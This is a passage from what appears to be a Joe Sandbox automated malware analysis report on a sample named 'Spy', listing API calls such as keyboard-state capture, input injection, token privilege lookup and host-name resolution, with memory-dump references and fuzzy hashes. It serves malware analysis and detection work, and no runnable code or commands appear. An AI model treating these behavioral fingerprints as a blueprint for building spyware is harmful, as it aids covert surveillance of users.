                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: 5eaf196c56d7e28f0db78d1182c9070c33e5d47e87116300b2779b58af905c05
                                                      • Instruction ID: 9f7f0e57f539fd3fcd88f5711863c12c5b10ff2df7572545612a786800754964
                                                      • Opcode Fuzzy Hash: 5eaf196c56d7e28f0db78d1182c9070c33e5d47e87116300b2779b58af905c05
                                                      • Instruction Fuzzy Hash: 01419071A00109AFCB14FBA4DE96EBEB3B9EF58310F148155F95A9B292DF30AD41C790
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B08F03
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
                                                      • Instruction ID: cb1252776e8fd23b2b3dd8e2ff221cf79a50af50e1d9854f44ba9ed68a948b7f
                                                      • Opcode Fuzzy Hash: bbef8703af188368302601d889c63a598404f5a65e71e72500b8efde6b3efae7
                                                      • Instruction Fuzzy Hash: 7631C33465411AEEEF209A24CC85BAC3FE6EB06320F544991FA91D71E1CFB0DB50CB91
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 00B0B1D2
                                                      • GetWindowRect.USER32(?,?), ref: 00B0B248
                                                      • PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
                                                      • MessageBeep.USER32(00000000), ref: 00B0B2C9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
                                                      • Instruction ID: 8f9e54fd1c236fc6cb2e6a132714f8d25c8cbc6d50825a4a39cce0d9f31ab7ab
                                                      • Opcode Fuzzy Hash: 4ffd8f1ce4ab8e59355f9a1d760c1b6e96bd82fc80ddb339c47dc19f332f787a
                                                      • Instruction Fuzzy Hash: E8414734A04219DFDB11DF99C884EAD7FF5FB4A350F1885E9E8189B2A5DB30A941CB90
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AE1326
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AE1342
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00AE13A8
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00AE13FA
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
                                                      • Instruction ID: 3bcbc4e818bbf3c8dbdd15eee4f9128d505e4b381903c64e9495f7673674a46c
                                                      • Opcode Fuzzy Hash: ae89d288b6509ccdc0639dac26125dd74fe89d98ccf0e5e1abfe6932ab4cd24f
                                                      • Instruction Fuzzy Hash: A3316E709402A9AEFF3187278C05BFEBBB6AB44310F04831AF4D05A6D5D3748D919B51
                                                      APIs
                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00AE1465
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AE1481
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00AE14E0
                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00AE1532
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
                                                      • Instruction ID: df67a6f7632f9aa601fe28f795501dbc7da2bc49ec7c99405d3ca878ec3d1453
                                                      • Opcode Fuzzy Hash: 2723c7f5ea06764e657ba19d1fe5224b634d61c32ec4db536f9111b170e449ac
                                                      • Instruction Fuzzy Hash: 10317BB09402A85EFF348B678C04BFEBBB6AB95310F48831AE491522D1C3788DC18B61
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AB642B
                                                      • __isleadbyte_l.LIBCMT ref: 00AB6459
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB6487
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00AB64BD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
                                                      • Instruction ID: 62e76cb6dd5e82742e97081ef8294711c1275487791356a26e53cd869b1ea122
                                                      • Opcode Fuzzy Hash: 692f599e26266c83300aa994ed8d2768cbeadf68d7f245888315f732168092b3
                                                      • Instruction Fuzzy Hash: 5031D031600A56AFDB218F65CE44BEB7FA9FF41320F154429F82487192DB39E890DB50
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00B0553F
                                                        • Part of subcall function 00AE3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AE3B4E
                                                        • Part of subcall function 00AE3B34: GetCurrentThreadId.KERNEL32 ref: 00AE3B55
                                                        • Part of subcall function 00AE3B34: AttachThreadInput.USER32(00000000,?,00AE55C0), ref: 00AE3B5C
                                                      • GetCaretPos.USER32(?), ref: 00B05550
                                                      • ClientToScreen.USER32(00000000,?), ref: 00B0558B
                                                      • GetForegroundWindow.USER32 ref: 00B05591
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 2e51fff592a9ecbc4596a4b972ea4d1558d244a7e492ef5c424b4e085569f85e
                                                      • Instruction ID: 547d2c92f03cf5fd209cfb0438719ef9ce8690fa5e3202a2b3105c044771fe25
                                                      • Opcode Fuzzy Hash: 2e51fff592a9ecbc4596a4b972ea4d1558d244a7e492ef5c424b4e085569f85e
                                                      • Instruction Fuzzy Hash: C4313C72900109AFDB10EFB5CD859EFB7F9EF98304F10406AE515E7241EA75AE408BA0
                                                      APIs
                                                        • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                      • GetCursorPos.USER32(?), ref: 00B0CB7A
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ABBCEC,?,?,?,?,?), ref: 00B0CB8F
                                                      • GetCursorPos.USER32(?), ref: 00B0CBDC
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ABBCEC,?,?,?), ref: 00B0CC16
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: d4aba9fda0628d54320ffd80144eac5e1ca1404e4d306df11ccf1d542c6b2570
                                                      • Instruction ID: 76e8286ce5c8e0554b405d2d7a08e8f64cda754ed7ee127269401dda1d946d52
                                                      • Opcode Fuzzy Hash: d4aba9fda0628d54320ffd80144eac5e1ca1404e4d306df11ccf1d542c6b2570
                                                      • Instruction Fuzzy Hash: E6318D35600018AFCB259F59C899EFA7FF6EB49310F444199F9059B2B1CB319D51EFA0
                                                      APIs
                                                      • __setmode.LIBCMT ref: 00AA0BE2
                                                        • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
                                                        • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065
                                                      • _fprintf.LIBCMT ref: 00AA0C19
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00AD694C
                                                        • Part of subcall function 00AA4CCA: _flsall.LIBCMT ref: 00AA4CE3
                                                      • __setmode.LIBCMT ref: 00AA0C4E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 24135a3c292c16f84bfa9ac03fbc3b397eb2307750ea320042ac5d76e38a86c4
                                                      • Instruction ID: 8c0203405aef3ba7ebedaff02d4155e9a5c3c6c3de1495bdf8f82b51a4cceebd
                                                      • Opcode Fuzzy Hash: 24135a3c292c16f84bfa9ac03fbc3b397eb2307750ea320042ac5d76e38a86c4
                                                      • Instruction Fuzzy Hash: 31110631A041046EDB08BBA4AE46DBE7B6DEF8A321F14015AF204972C2EFA55D5287A1
                                                      APIs
                                                        • Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
                                                        • Part of subcall function 00AD8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
                                                        • Part of subcall function 00AD8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
                                                        • Part of subcall function 00AD8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
                                                        • Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AD92C1
                                                      • _memcmp.LIBCMT ref: 00AD92E4
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AD931A
                                                      • HeapFree.KERNEL32(00000000), ref: 00AD9321
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: 1ef0c92a861c0e1d6d70bbbec83e4aedf9764bc6dfa7607e0ac19c4b490d5664
                                                      • Instruction ID: ec9f3a1ab67df505105c0809dc48681e2ecea20459a3e5971916aec0bc15e009
                                                      • Opcode Fuzzy Hash: 1ef0c92a861c0e1d6d70bbbec83e4aedf9764bc6dfa7607e0ac19c4b490d5664
                                                      • Instruction Fuzzy Hash: A4219D31E40109EFDB14DFA5C949BEEB7B8FF44301F14805AE896AB390D770AA44CB90
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00B063BD
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063D7
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063E5
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B063F3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: 3e082759615caa05d0569bdec7e442102e2957c0381a117f8f1a39bafa6af8af
                                                      • Instruction ID: 7fc01b417bd9c570663566dbe074768d921ad42addc381b3ee66492b2a4591c2
                                                      • Opcode Fuzzy Hash: 3e082759615caa05d0569bdec7e442102e2957c0381a117f8f1a39bafa6af8af
                                                      • Instruction Fuzzy Hash: 7511B131305514AFD705BB28DC55FBA7BA9EF45320F148259F916C72D1CBB0AD408B94
                                                      APIs
                                                        • Part of subcall function 00ADF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF867
                                                        • Part of subcall function 00ADF858: lstrcpyW.KERNEL32(00000000,?,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADF88D
                                                        • Part of subcall function 00ADF858: lstrcmpiW.KERNEL32(00000000,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF8BE
                                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE488
                                                      • lstrcpyW.KERNEL32(00000000,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE4AE
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE4E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 95340f2309d0c7fbe6a11c76c65326c0af8252a0f34e30751df7c93c0e4271d0
                                                      • Instruction ID: eb578b434cd8783d312c69188893c99819ee8c5527620e877827c210c23ac7f7
                                                      • Opcode Fuzzy Hash: 95340f2309d0c7fbe6a11c76c65326c0af8252a0f34e30751df7c93c0e4271d0
                                                      • Instruction Fuzzy Hash: 2B115B7A200345AFDB25AF24EC45D7E77A9FF45350B90802BF806CB3A0EB719990D7A1
                                                      APIs
                                                      • _free.LIBCMT ref: 00AB5331
                                                        • Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
                                                        • Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
                                                        • Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: c9de3625ec5d5f1d368bdfa4ee17bfe96945bf26272b30601a791e6d48320007
                                                      • Instruction ID: 6e31ab508b04045ff86fd3596f7af2a9eb16409b70777692c590acc54ba3fb11
                                                      • Opcode Fuzzy Hash: c9de3625ec5d5f1d368bdfa4ee17bfe96945bf26272b30601a791e6d48320007
                                                      • Instruction Fuzzy Hash: CE118232D05A16AFCB243F74AD157DA3AD8AF163A0B10452AF9589F2D2DFB489409790
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE4385
                                                      • _memset.LIBCMT ref: 00AE43A6
                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AE43F8
                                                      • CloseHandle.KERNEL32(00000000), ref: 00AE4401
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                      • String ID:
                                                      • API String ID: 1157408455-0
                                                      • Opcode ID: 546cac9450196f55561169b5c931287c3f09b19aa6288783cda0a64fdbc7a5dc
                                                      • Instruction ID: d73d34f8d635f7e97fb000dcaa4ea876a01425aaccdc0640eb822065869ee46b
                                                      • Opcode Fuzzy Hash: 546cac9450196f55561169b5c931287c3f09b19aa6288783cda0a64fdbc7a5dc
                                                      • Instruction Fuzzy Hash: 78110A719012287AD7309BA5AC4DFEBBB7CEF49720F00459AF908E72C0D6744E808BA4
                                                      APIs
                                                        • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
                                                        • Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065
                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00AF6A84
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00AF6A8F
                                                      • _memmove.LIBCMT ref: 00AF6ABC
                                                      • inet_ntoa.WSOCK32(?), ref: 00AF6AC7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: e0c7b5c80adeb02a3b09bdc1dfae34673fbd0736b6c2c1f87798603fc6b58803
                                                      • Instruction ID: 36ad75ea45cbd1dd0baa47a527321eafddc5940f89a51b2aa4e49f9a8e4dc0d3
                                                      • Opcode Fuzzy Hash: e0c7b5c80adeb02a3b09bdc1dfae34673fbd0736b6c2c1f87798603fc6b58803
                                                      • Instruction Fuzzy Hash: E5116375600109AFCB04FBE4CE86CEEB7B8EF08311B544165F602A72A1DF70AE40CB91
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD9719
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD972B
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD9741
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD975C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
